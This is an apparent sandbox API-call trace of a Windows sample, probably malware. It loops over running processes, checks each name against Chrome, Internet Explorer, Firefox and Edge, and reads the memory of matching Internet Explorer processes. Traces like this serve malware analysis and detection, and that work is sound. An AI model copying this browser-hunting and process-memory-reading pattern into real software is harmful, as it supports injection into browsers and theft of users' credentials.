	[0238.517] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0238.518] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x7e20
	[0238.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.518] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0238.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.518] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.518] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0238.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.519] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.519] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0238.520] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x7e24
	[0238.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.520] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0238.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.520] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.521] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0238.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.521] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.521] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0238.522] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x7e28
	[0238.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.522] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0238.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.523] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.524] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0238.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.524] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.551] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0238.552] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x7e2c
	[0238.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.552] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0238.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.553] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.553] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0238.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.554] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.554] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0238.555] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x7e30
	[0238.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.555] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0238.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.555] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.556] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0238.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.557] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.557] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0238.558] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x7e34
	[0238.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.558] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0238.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.559] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.559] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0238.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.560] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.560] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0238.561] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x7e38
	[0238.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.561] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0238.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.561] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0238.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.561] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0238.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.562] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.562] NtQueryInformationProcess (in: ProcessHandle=0x7e38, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0238.562] ReadProcessMemory (in: hProcess=0x7e38, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0238.562] ReadProcessMemory (in: hProcess=0x7e38, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0238.562] ReadProcessMemory (in: hProcess=0x7e38, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0238.562] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0238.562] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0238.563] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x7e3c
	[0238.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.563] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0238.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.564] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0238.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.564] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0238.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.564] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.564] NtQueryInformationProcess (in: ProcessHandle=0x7e3c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0238.564] ReadProcessMemory (in: hProcess=0x7e3c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0238.564] ReadProcessMemory (in: hProcess=0x7e3c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0238.565] ReadProcessMemory (in: hProcess=0x7e3c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0238.565] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0238.565] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0238.566] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x7e40
	[0238.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.566] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0238.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.566] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.566] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0238.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.567] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.567] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0238.567] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x7e44
	[0238.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.568] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0238.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.568] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.568] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0238.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.569] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.569] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.570] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x7e48
	[0238.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.570] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.570] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.570] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.571] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.571] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.571] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.572] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.572] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x7e4c
	[0238.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.573] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.573] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.573] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.573] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.574] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.574] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x7e50
	[0238.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.575] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.575] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.575] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.576] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.576] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0238.577] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x7e54
	[0238.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.577] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0238.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.577] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.577] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0238.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.578] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.578] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.579] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x7e58
	[0238.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.579] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.579] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.579] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.580] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.580] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.581] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x7e5c
	[0238.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.581] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.581] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.581] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.582] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.582] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0238.583] CloseHandle (hObject=0x4fd0) returned 1
	[0238.583] Sleep (dwMilliseconds=0x64) 
	[0238.683] GetCurrentProcessId () returned 0x110
	[0238.683] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0238.687] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0238.689] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0238.690] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0238.691] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x7e60
	[0238.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.691] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0238.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.692] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.692] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0238.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.693] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.693] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0238.694] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x7e64
	[0238.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.694] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0238.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.694] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.695] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0238.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.695] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.695] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0238.696] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x7e68
	[0238.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.696] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0238.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.697] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.697] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0238.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.698] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.698] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0238.698] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x7e6c
	[0238.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.699] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0238.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.699] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.699] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0238.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.700] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.700] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0238.701] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x7e70
	[0238.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.701] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0238.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.701] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.701] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0238.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.702] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.702] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0238.703] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x7e74
